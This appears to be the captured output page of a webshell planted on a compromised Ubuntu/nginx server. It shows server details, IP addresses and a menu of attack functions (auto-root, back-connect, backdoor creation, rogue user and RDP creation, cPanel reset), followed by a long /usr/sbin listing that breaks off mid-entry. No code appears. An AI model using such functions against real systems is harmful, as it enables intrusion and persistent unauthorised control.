Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
ModemManager
2.07
MB
-rwxr-xr-x
a2disconf
15.75
KB
-rwxr-xr-x
a2dismod
15.75
KB
-rwxr-xr-x
a2dissite
15.75
KB
-rwxr-xr-x
a2enconf
15.75
KB
-rwxr-xr-x
a2enmod
15.75
KB
-rwxr-xr-x
a2ensite
15.75
KB
-rwxr-xr-x
a2query
9.6
KB
-rwxr-xr-x
aa-load
38.75
KB
-rwxr-xr-x
aa-remove-unknown
3.15
KB
-rwxr-xr-x
aa-status
39.06
KB
-rwxr-xr-x
aa-teardown
137
B
-rwxr-xr-x
accessdb
14.55
KB
-rwxr-xr-x
add-shell
1.03
KB
-rwxr-xr-x
addgnupghome
3
KB
-rwxr-xr-x
addgroup
53.9
KB
-rwxr-xr-x
adduser
53.9
KB
-rwxr-xr-x
agetty
59.56
KB
-rwxr-xr-x
apache2
736.55
KB
-rwxr-xr-x
apache2ctl
7.26
KB
-rwxr-xr-x
apachectl
7.26
KB
-rwxr-xr-x
apparmor_parser
1.55
MB
-rwxr-xr-x
apparmor_status
39.06
KB
-rwxr-xr-x
applygnupgdefaults
2.17
KB
-rwxr-xr-x
argdist-bpfcc
36
KB
-rwxr-xr-x
arp
61.61
KB
-rwxr-xr-x
arpd
26.33
KB
-rwxr-xr-x
arptables
219.16
KB
-rwxr-xr-x
arptables-nft
219.16
KB
-rwxr-xr-x
arptables-nft-restore
219.16
KB
-rwxr-xr-x
arptables-nft-save
219.16
KB
-rwxr-xr-x
arptables-restore
219.16
KB
-rwxr-xr-x
arptables-save
219.16
KB
-rwxr-xr-x
audisp-af_unix
14.31
KB
-rwxr-xr-x
audisp-remote
50.41
KB
-rwxr-xr-x
audisp-syslog
18.3
KB
-rwxr-xr-x
audispd-zos-remote
34.38
KB
-rwxr-xr-x
auditctl
50.5
KB
-rwxr-xr-x
auditd
118.41
KB
-rwxr-xr-x
augenrules
3.74
KB
-rwxr-xr-x
aureport
110.41
KB
-rwxr-xr-x
ausearch
110.45
KB
-rwxr-xr-x
autrace
18.3
KB
-rwxr-xr-x
badblocks
34.32
KB
-rwxr-xr-x
bashreadline-bpfcc
2.32
KB
-rwxr-xr-x
bashreadline.bt
698
B
-rwxr-xr-x
bcache-super-show
14.3
KB
-rwxr-xr-x
bindsnoop-bpfcc
15.96
KB
-rwxr-xr-x
biolatency-bpfcc
11.1
KB
-rwxr-xr-x
biolatency-kp.bt
664
B
-rwxr-xr-x
biolatency.bt
681
B
-rwxr-xr-x
biolatpcts-bpfcc
10.01
KB
-rwxr-xr-x
biopattern-bpfcc
3.86
KB
-rwxr-xr-x
biosdecode
27.2
KB
-rwxr-xr-x
biosnoop-bpfcc
10.58
KB
-rwxr-xr-x
biosnoop.bt
1.12
KB
-rwxr-xr-x
biostacks.bt
915
B
-rwxr-xr-x
biotop-bpfcc
9.34
KB
-rwxr-xr-x
bitesize-bpfcc
1.14
KB
-rwxr-xr-x
bitesize.bt
567
B
-rwxr-xr-x
blkdeactivate
15.97
KB
-rwxr-xr-x
blkdiscard
22.38
KB
-rwxr-xr-x
blkid
54.41
KB
-rwxr-xr-x
blkzone
34.38
KB
-rwxr-xr-x
blockdev
34.38
KB
-rwxr-xr-x
bpflist-bpfcc
2.54
KB
-rwxr-xr-x
bpftool
1.58
KB
-rwxr-xr-x
bridge
108.49
KB
-rwxr-xr-x
btrfsdist-bpfcc
6.47
KB
-rwxr-xr-x
btrfsslower-bpfcc
9.75
KB
-rwxr-xr-x
cache_check
1.36
MB
-rwxr-xr-x
cache_dump
1.36
MB
-rwxr-xr-x
cache_metadata_size
1.36
MB
-rwxr-xr-x
cache_repair
1.36
MB
-rwxr-xr-x
cache_restore
1.36
MB
-rwxr-xr-x
cache_writeback
1.36
MB
-rwxr-xr-x
cachestat-bpfcc
6.38
KB
-rwxr-xr-x
cachetop-bpfcc
9.15
KB
-rwxr-xr-x
capable-bpfcc
8.28
KB
-rwxr-xr-x
capable.bt
1.88
KB
-rwxr-xr-x
capsh
57.09
KB
-rwxr-xr-x
cfdisk
94.73
KB
-rwxr-xr-x
cgdisk
166.48
KB
-rwxr-xr-x
chcpu
30.38
KB
-rwxr-xr-x
check_forensic
952
B
-rwxr-xr-x
chgpasswd
58.32
KB
-rwxr-xr-x
chmem
34.38
KB
-rwxr-xr-x
chpasswd
54.43
KB
-rwxr-xr-x
chroot
38.51
KB
-rwxr-xr-x
cobjnew-bpfcc
53
B
-rwxr-xr-x
compactsnoop-bpfcc
11.1
KB
-rwxr-xr-x
cpgr
48.45
KB
-rwxr-xr-x
cppw
48.45
KB
-rwxr-xr-x
cpudist-bpfcc
6.85
KB
-rwxr-xr-x
cpuunclaimed-bpfcc
14.59
KB
-rwxr-xr-x
cpuwalk.bt
497
B
-rwxr-xr-x
criticalstat-bpfcc
8.41
KB
-rwxr-xr-x
cron
58.67
KB
-rwxr-xr-x
cryptdisks_start
1.51
KB
-rwxr-xr-x
cryptdisks_stop
844
B
-rwxr-xr-x
cryptsetup
225.9
KB
-rwxr-xr-x
ctrlaltdel
14.38
KB
-rwxr-xr-x
dbslower-bpfcc
7.22
KB
-rwxr-xr-x
dbstat-bpfcc
3.7
KB
-rwxr-xr-x
dcb
80.52
KB
-rwxr-xr-x
dcsnoop-bpfcc
4.03
KB
-rwxr-xr-x
dcsnoop.bt
1.23
KB
-rwxr-xr-x
dcstat-bpfcc
3.77
KB
-rwxr-xr-x
deadlock-bpfcc
20.45
KB
-rwxr-xr-x
debugfs
225.87
KB
-rwxr-xr-x
delgroup
18.53
KB
-rwxr-xr-x
deluser
18.53
KB
-rwxr-xr-x
depmod
170.24
KB
-rwxr-xr-x
devlink
150.86
KB
-rwxr-xr-x
dhcpcd
395.4
KB
-rwxr-xr-x
dirtop-bpfcc
8.37
KB
-rwxr-xr-x
dmeventd
50.38
KB
-rwxr-xr-x
dmidecode
135.25
KB
-rwxr-xr-x
dmsetup
171.05
KB
-rwxr-xr-x
dmstats
171.05
KB
-rwxr-xr-x
dosfsck
78.38
KB
-rwxr-xr-x
dosfslabel
38.38
KB
-rwxr-xr-x
dpkg-preconfigure
4.25
KB
-rwxr-xr-x
dpkg-reconfigure
4.43
KB
-rwxr-xr-x
drsnoop-bpfcc
6.73
KB
-rwxr-xr-x
dumpe2fs
34.31
KB
-rwxr-xr-x
e2freefrag
18.3
KB
-rwxr-xr-x
e2fsck
364.34
KB
-rwxr-xr-x
e2image
42.31
KB
-rwxr-xr-x
e2label
110.56
KB
-rwxr-xr-x
e2mmpstatus
34.31
KB
-rwxr-xr-x
e2scrub
7.12
KB
-rwxr-xr-x
e2scrub_all
5.27
KB
-rwxr-xr-x
e2undo
22.3
KB
-rwxr-xr-x
e4crypt
30.38
KB
-rwxr-xr-x
e4defrag
34.3
KB
-rwxr-xr-x
ebtables
219.16
KB
-rwxr-xr-x
ebtables-nft
219.16
KB
-rwxr-xr-x
ebtables-nft-restore
219.16
KB
-rwxr-xr-x
ebtables-nft-save
219.16
KB
-rwxr-xr-x
ebtables-restore
219.16
KB
-rwxr-xr-x
ebtables-save
219.16
KB
-rwxr-xr-x
ebtables-translate
219.16
KB
-rwxr-xr-x
era_check
1.36
MB
-rwxr-xr-x
era_dump
1.36
MB
-rwxr-xr-x
era_invalidate
1.36
MB
-rwxr-xr-x
era_restore
1.36
MB
-rwxr-xr-x
ethtool
651.68
KB
-rwxr-xr-x
execsnoop-bpfcc
9.82
KB
-rwxr-xr-x
execsnoop.bt
928
B
-rwxr-xr-x
exitsnoop-bpfcc
9.42
KB
-rwxr-xr-x
ext4dist-bpfcc
6.53
KB
-rwxr-xr-x
ext4slower-bpfcc
9.71
KB
-rwxr-xr-x
faillock
22.31
KB
-rwxr-xr-x
fatlabel
38.38
KB
-rwxr-xr-x
fdisk
114.42
KB
-rwxr-xr-x
filefrag
18.32
KB
-rwxr-xr-x
filegone-bpfcc
5.64
KB
-rwxr-xr-x
filelife-bpfcc
6.38
KB
-rwxr-xr-x
fileslower-bpfcc
7.2
KB
-rwxr-xr-x
filetop-bpfcc
6.35
KB
-rwxr-xr-x
findfs
14.38
KB
-rwxr-xr-x
fixparts
58.48
KB
-rwxr-xr-x
fsadm
24
KB
-rwxr-xr-x
fsck
42.42
KB
-rwxr-xr-x
fsck.btrfs
1.16
KB
-rwxr-xr-x
fsck.cramfs
30.44
KB
-rwxr-xr-x
fsck.ext2
364.34
KB
-rwxr-xr-x
fsck.ext3
364.34
KB
-rwxr-xr-x
fsck.ext4
364.34
KB
-rwxr-xr-x
fsck.fat
78.38
KB
-rwxr-xr-x
fsck.minix
54.41
KB
-rwxr-xr-x
fsck.msdos
78.38
KB
-rwxr-xr-x
fsck.vfat
78.38
KB
-rwxr-xr-x
fsck.xfs
2.51
KB
-rwxr-xr-x
fsfreeze
14.38
KB
-rwxr-xr-x
fstab-decode
14.3
KB
-rwxr-xr-x
fstrim
42.38
KB
-rwxr-xr-x
funccount-bpfcc
12.68
KB
-rwxr-xr-x
funcinterval-bpfcc
5.46
KB
-rwxr-xr-x
funclatency-bpfcc
11.28
KB
-rwxr-xr-x
funcslower-bpfcc
10.38
KB
-rwxr-xr-x
gdisk
198.48
KB
-rwxr-xr-x
genl
120.58
KB
-rwxr-xr-x
getcap
14.3
KB
-rwxr-xr-x
gethostlatency-bpfcc
3.82
KB
-rwxr-xr-x
gethostlatency.bt
1.19
KB
-rwxr-xr-x
getpcaps
14.3
KB
-rwxr-xr-x
getty
59.56
KB
-rwxr-xr-x
groupadd
71.13
KB
-rwxr-xr-x
groupdel
62.91
KB
-rwxr-xr-x
groupmems
58.34
KB
-rwxr-xr-x
groupmod
71.04
KB
-rwxr-xr-x
grpck
58.32
KB
-rwxr-xr-x
grpconv
50.16
KB
-rwxr-xr-x
grpunconv
50.16
KB
-rwxr-xr-x
grub-bios-setup
958.55
KB
-rwxr-xr-x
grub-install
1.17
MB
-rwxr-xr-x
grub-macbless
946.41
KB
-rwxr-xr-x
grub-mkconfig
8.63
KB
-rwxr-xr-x
grub-mkdevicemap
70.69
KB
-rwxr-xr-x
grub-probe
954.66
KB
-rwxr-xr-x
grub-reboot
4.73
KB
-rwxr-xr-x
grub-set-default
3.47
KB
-rwxr-xr-x
halt
1.43
MB
-rwxr-xr-x
hardirqs-bpfcc
6.85
KB
-rwxr-xr-x
hdparm
139.43
KB
-rwxr-xr-x
httxt2dbm
14.3
KB
-rwxr-xr-x
iconvconfig
34.47
KB
-rwxr-xr-x
ifconfig
77.17
KB
-rwxr-xr-x
iftop
62.62
KB
-rwxr-xr-x
init
98.45
KB
-rwxr-xr-x
inject-bpfcc
16.06
KB
-rwxr-xr-x
insmod
170.24
KB
-rwxr-xr-x
install-sgmlcatalog
4.44
KB
-rwxr-xr-x
installkernel
2.6
KB
-rwxr-xr-x
integritysetup
67.06
KB
-rwxr-xr-x
invoke-rc.d
16.13
KB
-rwxr-xr-x
iotop
113.64
KB
-rwxr-xr-x
iotop-c
113.64
KB
-rwxr-xr-x
ip
754.8
KB
-rwxr-xr-x
ip6tables
219.16
KB
-rwxr-xr-x
ip6tables-apply
6.89
KB
-rwxr-xr-x
ip6tables-legacy
92.95
KB
-rwxr-xr-x
ip6tables-legacy-restore
92.95
KB
-rwxr-xr-x
ip6tables-legacy-save
92.95
KB
-rwxr-xr-x
ip6tables-nft
219.16
KB
-rwxr-xr-x
ip6tables-nft-restore
219.16
KB
-rwxr-xr-x
ip6tables-nft-save
219.16
KB
-rwxr-xr-x
ip6tables-restore
219.16
KB
-rwxr-xr-x
ip6tables-restore-translate
219.16
KB
-rwxr-xr-x
ip6tables-save
219.16
KB
-rwxr-xr-x
ip6tables-translate
219.16
KB
-rwxr-xr-x
ipmaddr
18.3
KB
-rwxr-xr-x
iptables
219.16
KB
-rwxr-xr-x
iptables-apply
6.89
KB
-rwxr-xr-x
iptables-legacy
92.95
KB
-rwxr-xr-x
iptables-legacy-restore
92.95
KB
-rwxr-xr-x
iptables-legacy-save
92.95
KB
-rwxr-xr-x
iptables-nft
219.16
KB
-rwxr-xr-x
iptables-nft-restore
219.16
KB
-rwxr-xr-x
iptables-nft-save
219.16
KB
-rwxr-xr-x
iptables-restore
219.16
KB
-rwxr-xr-x
iptables-restore-translate
219.16
KB
-rwxr-xr-x
iptables-save
219.16
KB
-rwxr-xr-x
iptables-translate
219.16
KB
-rwxr-xr-x
iptunnel
18.3
KB
-rwxr-xr-x
iscsi-iname
18.3
KB
-rwxr-xr-x
iscsi_discovery
5.17
KB
-rwxr-xr-x
iscsiadm
370.43
KB
-rwxr-xr-x
iscsid
286.55
KB
-rwxr-xr-x
iscsistart
274.49
KB
-rwxr-xr-x
isosize
14.38
KB
-rwxr-xr-x
javacalls-bpfcc
55
B
-rwxr-xr-x
javaflow-bpfcc
54
B
-rwxr-xr-x
javagc-bpfcc
52
B
-rwxr-xr-x
javaobjnew-bpfcc
56
B
-rwxr-xr-x
javastat-bpfcc
54
B
-rwxr-xr-x
javathreads-bpfcc
57
B
-rwxr-xr-x
kbdrate
18.31
KB
-rwxr-xr-x
killall5
26.23
KB
-rwxr-xr-x
killsnoop-bpfcc
4.45
KB
-rwxr-xr-x
killsnoop.bt
873
B
-rwxr-xr-x
klockstat-bpfcc
13.04
KB
-rwxr-xr-x
kpartx
42.16
KB
-rwxr-xr-x
kvmexit-bpfcc
11.19
KB
-rwxr-xr-x
ldattach
26.38
KB
-rwxr-xr-x
ldconfig
387
B
-rwxr-xr-x
ldconfig.real
1
MB
-rwxr-xr-x
llcstat-bpfcc
4.48
KB
-rwxr-xr-x
loads.bt
1.1
KB
-rwxr-xr-x
locale-gen
4.21
KB
-rwxr-xr-x
logrotate
94.24
KB
-rwxr-xr-x
logsave
14.16
KB
-rwxr-xr-x
losetup
74.52
KB
-rwxr-xr-x
lsmod
170.24
KB
-rwxr-xr-x
luksformat
3.32
KB
-rwxr-xr-x
lvchange
3.01
MB
-rwxr-xr-x
lvconvert
3.01
MB
-rwxr-xr-x
lvcreate
3.01
MB
-rwxr-xr-x
lvdisplay
3.01
MB
-rwxr-xr-x
lvextend
3.01
MB
-rwxr-xr-x
lvm
3.01
MB
-rwxr-xr-x
lvmconfig
3.01
MB
-rwxr-xr-x
lvmdiskscan
3.01
MB
-rwxr-xr-x
lvmdump
10.12
KB
-rwxr-xr-x
lvmpolld
235.97
KB
-rwxr-xr-x
lvmsadc
3.01
MB
-rwxr-xr-x
lvmsar
3.01
MB
-rwxr-xr-x
lvreduce
3.01
MB
-rwxr-xr-x
lvremove
3.01
MB
-rwxr-xr-x
lvrename
3.01
MB
-rwxr-xr-x
lvresize
3.01
MB
-rwxr-xr-x
lvs
3.01
MB
-rwxr-xr-x
lvscan
3.01
MB
-rwxr-xr-x
lxc
589
B
-rwxr-xr-x
lxd
589
B
-rwxr-xr-x
make-bcache
22.38
KB
-rwxr-xr-x
make-ssl-cert
6.65
KB
-rwxr-xr-x
mariadbd
26.09
MB
-rwxr-xr-x
mdadm
622.21
KB
-rwxr-xr-x
mdflush-bpfcc
2.24
KB
-rwxr-xr-x
mdflush.bt
775
B
-rwxr-xr-x
mdmon
258.8
KB
-rwxr-xr-x
memleak-bpfcc
20.8
KB
-rwxr-xr-x
mii-tool
26.73
KB
-rwxr-xr-x
mkdosfs
50.83
KB
-rwxr-xr-x
mke2fs
130.62
KB
-rwxr-xr-x
mkfs
14.38
KB
-rwxr-xr-x
mkfs.bfs
22.38
KB
-rwxr-xr-x
mkfs.btrfs
560.3
KB
-rwxr-xr-x
mkfs.cramfs
34.32
KB
-rwxr-xr-x
mkfs.ext2
130.62
KB
-rwxr-xr-x
mkfs.ext3
130.62
KB
-rwxr-xr-x
mkfs.ext4
130.62
KB
-rwxr-xr-x
mkfs.fat
50.83
KB
-rwxr-xr-x
mkfs.minix
42.39
KB
-rwxr-xr-x
mkfs.msdos
50.83
KB
-rwxr-xr-x
mkfs.ntfs
66.38
KB
-rwxr-xr-x
mkfs.vfat
50.83
KB
-rwxr-xr-x
mkfs.xfs
438.99
KB
-rwxr-xr-x
mkhomedir_helper
22.34
KB
-rwxr-xr-x
mkinitramfs
15.39
KB
-rwxr-xr-x
mklost+found
14.3
KB
-rwxr-xr-x
mkntfs
66.38
KB
-rwxr-xr-x
mkswap
50.38
KB
-rwxr-xr-x
modinfo
170.24
KB
-rwxr-xr-x
modprobe
170.24
KB
-rwxr-xr-x
mount.fuse
18.3
KB
-rwxr-xr-x
mount.fuse3
18.3
KB
-rwxr-xr-x
mount.lowntfs-3g
118.98
KB
-rwxr-xr-x
mount.ntfs
159.01
KB
-rwxr-xr-x
mount.ntfs-3g
159.01
KB
-rwxr-xr-x
mountsnoop-bpfcc
14.62
KB
-rwxr-xr-x
mpathpersist
31.21
KB
-rwxr-xr-x
multipath
34.3
KB
-rwxr-xr-x
multipathc
18.3
KB
-rwxr-xr-x
multipathd
142.46
KB
-rwxr-xr-x
mysqld
26.09
MB
-rwxr-xr-x
mysqld_qslower-bpfcc
3.05
KB
-rwxr-xr-x
nameif
14.39
KB
-rwxr-xr-x
naptime.bt
1.01
KB
-rwxr-xr-x
needrestart
40.13
KB
-rwxr-xr-x
netplan
802
B
-rwxr-xr-x
netqtop-bpfcc
5.59
KB
-rwxr-xr-x
newusers
86.96
KB
-rwxr-xr-x
nfnl_osf
18.3
KB
-rwxr-xr-x
nfsdist-bpfcc
4.95
KB
-rwxr-xr-x
nfsslower-bpfcc
13.61
KB
-rwxr-xr-x
nft
26.23
KB
-rwxr-xr-x
nginx
1.25
MB
-rwxr-xr-x
nodegc-bpfcc
52
B
-rwxr-xr-x
nodestat-bpfcc
54
B
-rwxr-xr-x
nologin
14.3
KB
-rwxr-xr-x
ntfsclone
50.38
KB
-rwxr-xr-x
ntfscp
30.38
KB
-rwxr-xr-x
ntfslabel
22.38
KB
-rwxr-xr-x
ntfsresize
62.39
KB
-rwxr-xr-x
ntfsundelete
50.38
KB
-rwxr-xr-x
offcputime-bpfcc
13.46
KB
-rwxr-xr-x
offwaketime-bpfcc
15.31
KB
-rwxr-xr-x
on_ac_power
3.7
KB
-rwxr-xr-x
oomkill-bpfcc
2.04
KB
-rwxr-xr-x
oomkill.bt
1.17
KB
-rwxr-xr-x
opensnoop-bpfcc
14.24
KB
-rwxr-xr-x
opensnoop.bt
953
B
-rwxr-xr-x
overlayroot-chroot
2.45
KB
-rwxr-xr-x
ownership
14.45
KB
-rwxr-xr-x
pam-auth-update
20.96
KB
-rwxr-xr-x
pam_extrausers_chkpwd
26.31
KB
-rwxr-sr-x
pam_extrausers_update
34.31
KB
-rwxr-xr-x
pam_getenv
2.82
KB
-rwxr-xr-x
pam_namespace_helper
467
B
-rwxr-xr-x
pam_timestamp_check
14.31
KB
-rwxr-xr-x
parted
94.4
KB
-rwxr-xr-x
partprobe
14.38
KB
-rwxr-xr-x
pdata_tools
1.36
MB
-rwxr-xr-x
perlcalls-bpfcc
55
B
-rwxr-xr-x
perlflow-bpfcc
54
B
-rwxr-xr-x
perlstat-bpfcc
54
B
-rwxr-xr-x
php-fpm8.3
5.49
MB
-rwxr-xr-x
phpcalls-bpfcc
54
B
-rwxr-xr-x
phpdismod
7.11
KB
-rwxr-xr-x
phpenmod
7.11
KB
-rwxr-xr-x
phpflow-bpfcc
53
B
-rwxr-xr-x
phpquery
6.24
KB
-rwxr-xr-x
phpstat-bpfcc
53
B
-rwxr-xr-x
pidpersec-bpfcc
1.08
KB
-rwxr-xr-x
pidpersec.bt
628
B
-rwxr-xr-x
pivot_root
14.38
KB
-rwxr-xr-x
plipconfig
14.3
KB
-rwxr-xr-x
plymouthd
146.57
KB
-rwxr-xr-x
poweroff
1.43
MB
-rwxr-xr-x
ppchcalls-bpfcc
13.89
KB
-rwxr-xr-x
profile-bpfcc
14.41
KB
-rwxr-xr-x
pvchange
3.01
MB
-rwxr-xr-x
pvck
3.01
MB
-rwxr-xr-x
pvcreate
3.01
MB
-rwxr-xr-x
pvdisplay
3.01
MB
-rwxr-xr-x
pvmove
3.01
MB
-rwxr-xr-x
pvremove
3.01
MB
-rwxr-xr-x
pvresize
3.01
MB
-rwxr-xr-x
pvs
3.01
MB
-rwxr-xr-x
pvscan
3.01
MB
-rwxr-xr-x
pwck
54.29
KB
-rwxr-xr-x
pwconv
46.16
KB
-rwxr-xr-x
pwhistory_helper
22.31
KB
-rwxr-xr-x
pwunconv
46.16
KB
-rwxr-xr-x
pythoncalls-bpfcc
57
B
-rwxr-xr-x
pythonflow-bpfcc
56
B
-rwxr-xr-x
pythongc-bpfcc
54
B
-rwxr-xr-x
pythonstat-bpfcc
56
B
-rwxr-xr-x
rarp
32.33
KB
-rwxr-xr-x
rdmaucma-bpfcc
4.95
KB
-rwxr-xr-x
readahead-bpfcc
6.54
KB
-rwxr-xr-x
readprofile
22.41
KB
-rwxr-xr-x
reboot
1.43
MB
-rwxr-xr-x
remove-shell
1.08
KB
-rwxr-xr-x
reset-trace-bpfcc
3.42
KB
-rwxr-xr-x
resize2fs
70.3
KB
-rwxr-xr-x
resolvconf
158.67
KB
-rwxr-xr-x
rmmod
170.24
KB
-rwxr-xr-x
rmt
54.71
KB
-rwxr-xr-x
rmt-tar
54.71
KB
-rwxr-xr-x
route
68.27
KB
-rwxr-xr-x
rsyslogd
771.67
KB
-rwxr-xr-x
rtacct
28.31
KB
-rwxr-xr-x
rtcwake
34.38
KB
-rwxr-xr-x
rtmon
116.52
KB
-rwxr-xr-x
rubycalls-bpfcc
55
B
-rwxr-xr-x
rubyflow-bpfcc
54
B
-rwxr-xr-x
rubygc-bpfcc
52
B
-rwxr-xr-x
rubyobjnew-bpfcc
56
B
-rwxr-xr-x
rubystat-bpfcc
54
B
-rwxr-xr-x
runlevel
1.43
MB
-rwxr-xr-x
runqlat-bpfcc
9.3
KB
-rwxr-xr-x
runqlat.bt
788
B
-rwxr-xr-x
runqlen-bpfcc
8.05
KB
-rwxr-xr-x
runqlen.bt
1.01
KB
-rwxr-xr-x
runqslower-bpfcc
9.01
KB
-rwxr-xr-x
runuser
54.38
KB
-rwxr-xr-x
service
8.89
KB
-rwxr-xr-x
setcap
14.3
KB
-rwxr-xr-x
setuids.bt
1.76
KB
-rwxr-xr-x
setvesablank
14.37
KB
-rwxr-xr-x
setvtrgb
14.43
KB
-rwxr-xr-x
sfdisk
106.38
KB
-rwxr-xr-x
sgdisk
178.48
KB
-rwxr-xr-x
shadowconfig
2.22
KB
-rwxr-xr-x
shmsnoop-bpfcc
7.8
KB
-rwxr-xr-x
shutdown
1.43
MB
-rwxr-xr-x
slabratetop-bpfcc
6.38
KB
-rwxr-xr-x
slattach
36.08
KB
-rwxr-xr-x
sofdsnoop-bpfcc
8.06
KB
-rwxr-xr-x
softirqs-bpfcc
5.59
KB
-rwxr-xr-x
solisten-bpfcc
5.96
KB
-rwxr-xr-x
split-logfile
2.36
KB
-rwxr-xr-x
sshd
899.82
KB
-rwxr-xr-x
ssllatency.bt
2.08
KB
-rwxr-xr-x
sslsniff-bpfcc
13.68
KB
-rwxr-xr-x
sslsnoop.bt
1.99
KB
-rwxr-xr-x
stackcount-bpfcc
16.26
KB
-rwxr-xr-x
start-stop-daemon
47.49
KB
-rwxr-xr-x
statsnoop-bpfcc
4.92
KB
-rwxr-xr-x
statsnoop.bt
1.26
KB
-rwxr-xr-x
sudo_logsrvd
248.5
KB
-rwxr-xr-x
sudo_sendlog
131.67
KB
-rwxr-xr-x
sulogin
42.38
KB
-rwxr-xr-x
swapin.bt
600
B
-rwxr-xr-x
swaplabel
18.38
KB
-rwxr-xr-x
swapoff
22.38
KB
-rwxr-xr-x
swapon
42.38
KB
-rwxr-xr-x
switch_root
22.38
KB
-rwxr-xr-x
syncsnoop-bpfcc
1.27
KB
-rwxr-xr-x
syncsnoop.bt
839
B
-rwxr-xr-x
syscount-bpfcc
8.57
KB
-rwxr-xr-x
syscount.bt
872
B
-rwxr-xr-x
sysctl
30.38
KB
-rwxr-xr-x
tarcat
936
B
-rwxr-xr-x
tc
630.08
KB
-rwxr-xr-x
tclcalls-bpfcc
54
B
-rwxr-xr-x
tclflow-bpfcc
53
B
-rwxr-xr-x
tclobjnew-bpfcc
55
B
-rwxr-xr-x
tclstat-bpfcc
53
B
-rwxr-xr-x
tcpaccept-bpfcc
9
KB
-rwxr-xr-x
tcpaccept.bt
1.71
KB
-rwxr-xr-x
tcpcong-bpfcc
20.11
KB
-rwxr-xr-x
tcpconnect-bpfcc
18.46
KB
-rwxr-xr-x
tcpconnect.bt
1.58
KB
-rwxr-xr-x
tcpconnlat-bpfcc
9.07
KB
-rwxr-xr-x
tcpdrop-bpfcc
7.44
KB
-rwxr-xr-x
tcpdrop.bt
2.41
KB
-rwxr-xr-x
tcplife-bpfcc
16.55
KB
-rwxr-xr-x
tcplife.bt
2.72
KB
-rwxr-xr-x
tcpretrans-bpfcc
13.77
KB
-rwxr-xr-x
tcpretrans.bt
2.07
KB
-rwxr-xr-x
tcprtt-bpfcc
8.7
KB
-rwxr-xr-x
tcpstates-bpfcc
13.73
KB
-rwxr-xr-x
tcpsubnet-bpfcc
7.63
KB
-rwxr-xr-x
tcpsynbl-bpfcc
2.12
KB
-rwxr-xr-x
tcpsynbl.bt
962
B
-rwxr-xr-x
tcptop-bpfcc
12.64
KB
-rwxr-xr-x
tcptracer-bpfcc
17.71
KB
-rwxr-xr-x
telinit
1.43
MB
-rwxr-xr-x
thin_check
1.36
MB
-rwxr-xr-x
thin_delta
1.36
MB
-rwxr-xr-x
thin_dump
1.36
MB
-rwxr-xr-x
thin_ls
1.36
MB
-rwxr-xr-x
thin_metadata_size
1.36
MB
-rwxr-xr-x
thin_repair
1.36
MB
-rwxr-xr-x
thin_restore
1.36
MB
-rwxr-xr-x
thin_rmap
1.36
MB
-rwxr-xr-x
thin_trim
1.36
MB
-rwxr-xr-x
threadsnoop-bpfcc
1.81
KB
-rwxr-xr-x
threadsnoop.bt
712
B
-rwxr-xr-x
tipc
90.52
KB
-rwxr-xr-x
tplist-bpfcc
4.06
KB
-rwxr-xr-x
trace-bpfcc
42.86
KB
-rwxr-xr-x
ttysnoop-bpfcc
7.51
KB
-rwxr-xr-x
tune2fs
110.56
KB
-rwxr-xr-x
ucalls
11.69
KB
-rwxr-xr-x
uflow
7.92
KB
-rwxr-xr-x
ufw
4.84
KB
-rwxr-xr-x
ugc
7.64
KB
-rwxr-xr-x
umount.udisks2
14.3
KB
-rwxr-xr-x
undump.bt
789
B
-rwxr-xr-x
unix_chkpwd
30.31
KB
-rwxr-sr-x
unix_update
34.31
KB
-rwxr-xr-x
uobjnew
6.04
KB
-rwxr-xr-x
update-ca-certificates
5.32
KB
-rwxr-xr-x
update-catalog
9.17
KB
-rwxr-xr-x
update-grub
64
B
-rwxr-xr-x
update-grub-gfxpayload
301
B
-rwxr-xr-x
update-grub2
64
B
-rwxr-xr-x
update-ieee-data
3.41
KB
-rwxr-xr-x
update-info-dir
1.66
KB
-rwxr-xr-x
update-initramfs
6.75
KB
-rwxr-xr-x
update-locale
2.99
KB
-rwxr-xr-x
update-passwd
34.56
KB
-rwxr-xr-x
update-pciids
1.74
KB
-rwxr-xr-x
update-rc.d
17.72
KB
-rwxr-xr-x
update-secureboot-policy
7.43
KB
-rwxr-xr-x
update-shells
3.89
KB
-rwxr-xr-x
update-xmlcatalog
16.88
KB
-rwxr-xr-x
upgrade-from-grub-legacy
1.56
KB
-rwxr-xr-x
usb_modeswitch
59.66
KB
-rwxr-xr-x
usb_modeswitch_dispatcher
26.78
KB
-rwxr-xr-x
useradd
139.88
KB
-rwxr-xr-x
userdel
91.01
KB
-rwxr-xr-x
usermod
127.65
KB
-rwxr-xr-x
ustat
12.12
KB
-rwxr-xr-x
uthreads
4
KB
-rwxr-xr-x
uuidd
30.88
KB
-rwxr-xr-x
validlocale
1.73
KB
-rwxr-xr-x
vcstime
14.3
KB
-rwxr-xr-x
vdpa
34.56
KB
-rwxr-xr-x
veritysetup
43.94
KB
-rwxr-xr-x
vfscount-bpfcc
1.36
KB
-rwxr-xr-x
vfscount.bt
515
B
-rwxr-xr-x
vfsstat-bpfcc
4.06
KB
-rwxr-xr-x
vfsstat.bt
721
B
-rwxr-xr-x
vgcfgbackup
3.01
MB
-rwxr-xr-x
vgcfgrestore
3.01
MB
-rwxr-xr-x
vgchange
3.01
MB
-rwxr-xr-x
vgck
3.01
MB
-rwxr-xr-x
vgconvert
3.01
MB
-rwxr-xr-x
vgcreate
3.01
MB
-rwxr-xr-x
vgdisplay
3.01
MB
-rwxr-xr-x
vgexport
3.01
MB
-rwxr-xr-x
vgextend
3.01
MB
-rwxr-xr-x
vgimport
3.01
MB
-rwxr-xr-x
vgimportclone
3.01
MB
-rwxr-xr-x
vgmerge
3.01
MB
-rwxr-xr-x
vgmknodes
3.01
MB
-rwxr-xr-x
vgreduce
3.01
MB
-rwxr-xr-x
vgremove
3.01
MB
-rwxr-xr-x
vgrename
3.01
MB
-rwxr-xr-x
vgs
3.01
MB
-rwxr-xr-x
vgscan
3.01
MB
-rwxr-xr-x
vgsplit
3.01
MB
-rwxr-xr-x
vigr
60.69
